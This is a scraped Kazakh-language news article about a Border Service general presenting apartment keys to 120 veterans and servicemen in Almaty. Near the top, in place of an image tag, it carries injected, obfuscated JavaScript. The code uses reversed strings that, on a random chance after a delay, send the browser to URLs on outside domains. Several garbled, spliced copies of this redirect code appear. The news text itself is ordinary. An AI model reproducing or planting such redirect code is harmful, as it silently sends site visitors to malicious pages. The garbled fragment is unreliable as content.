«Хан тәңіріне» қоныстанды

«Хан тәңіріне» қоныстанды

4-bet-Han-tanirine-konystan$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/4-bet-Han-tanirine-konystan.jpg» height=»151″ width=»198″ />

Ұлттық қауіпсіздік комитеті төрағасының орынбасары — Шекара қызметінің директоры генерал-майор Нұржан Мырзалиев Алматыдағы тау бөктеріне орналасқан «Хан-Тәңірі» тұрғын үй кешеніндегі жаңа салынған көпқабаттағы үйлердегі 120 пәтердің кілтін Шекара қызметінің ардагерлеріне және Алматы гарнизонында қызмет атқарып жүрген әскери қызметшілерге салтанатпен табыстады.

Қазақстандық шекарашыларға басқа көршілес республикалардағы әріптестерінің қызығып қарайтындай жөні бар. Біздің шекарашы офицерлер мен қызметшілер республиканың әр облысынан жыл сайын жаңа пәтерлерге ие болып, жаңа баспанаға қоныстануда. Жақында ғана, қыркүйек айында Шымкент қаласында шекарашыларға арналған тұрғын үй бой көтеріп, 60 әскери қызметшілер мен ардагер-шекарашылардың отбасы қоныс той жасады. Мұның бәрі республикалық бюджеттен бөлінген қаржыға алынып жатыр. Қазіргі кезде республикалық бюджет бөлген қаржыға шекара қызметіндегілер үшін тағы да көпқабатты бес тұрғын үй салынуда. Атап айтқанда, Ақтөбе, Өскемен, Орал қалаларында 60 пәтерлік, сондай-ақ Талдықорған, Павлодар қалаларында 75 пәтерлік көпқабатты үйлер жақын арада пайдалануға берілмек.
— Қазақстанның Тәуелсіздігіне 20 жыл толу қарсаңында бізде үлкен қуаныш болып жатыр. Алатаудың төсіне орналасқан үйлерден қызметкерлеріміз 120 пәтердің кілтіне ие болды. Бұл пәтерлердің 70-і ардагер-шекарашыларға және 50 пәтер Алматы гарнизонында қызмет атқарып жүрген әскери қызметшілерге берілді. Шынын айту керек, зейнеткерлікке шыққан әскери қызметкерлердің ішінде пәтер тосып жүргендеріне он-он бес жыл болғандар бар. Сондықтан бұл шараны үлкен қуаныш деп санаймын. Осының бәрі Елбасы мен Үкіметтің қолдауымен жасалып жатыр. Құрлықтағы шекара отрядтары жаңа технологиялармен, радиолокациялық стансалармен, су акваториларындағы шекарашылар күзет катерлерімен жабдықталуда. Осы сәтті пайдаланып біздің шекарашыларды Қазақстанның Тәуелсіздігіне 20 жыл толумен құттықтағым келеді. Алдағы уақытта әскери борыштарын атқару ісінде табыстарға жетулеріне тілектеспін, — дейді Ұлттық қауіпсіздік комитеті төрағасының орынбасары — Шекара қызметінің директоры генерал-майор Нұржан Мырзалиев.
Ғұмырын қасиетті ел іргесін күзетуге арнап, зейнеткерлікке шыққан Шекара қызметінің ардагерлері жайлы, кең пәтерлерге қоныстанып марқайып қалды. Кейбір ардагер-шекарашыларға қазір қызмет етіп жүрген балаларымен бірге қоныс тойын тойлауға бұйырыпты. Мысалы, 2002 жылы зейнеткерлікке шыққан Сергей Баратов төрт бөлмелі пәтерге ие болса, ата жолын қуып әскери қызметте жүрген оның қызы Самира көрші үйдегі бір бөлмелі пәтерге қоныстанды. Сөйтіп, бір күнде екі пәтерге қол жеткізген Баратовтар отбасында ғана емес, осындай 120 жанұяда бүгін үлкен той.
«Шығыс» аймақтық басқармасының бастығы полковник Асқар Жабағиевтің айтуынша, Шекара қызметінің директоры, генерал-майор Нұржан Мырзалиевтің қолынан Алматы гарнизонындағы авиабаза, байланыс, питомник сияқты қызметтерде жүрген бірқатар офицерлер жаңа үйдегі пәтерлердің кілтін алған. «Шығыс» аймақтық басқармасының жиырма әскери қызметкері кеше қоныс тойын мерекеледі.

www.Kyzmet-gazeti.kz

http://www.aikyn.kz/index.php?option=com_content&task=view&id=10898&Itemid=2{jcomments on}

Leave a Reply

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Яндекс.Метрика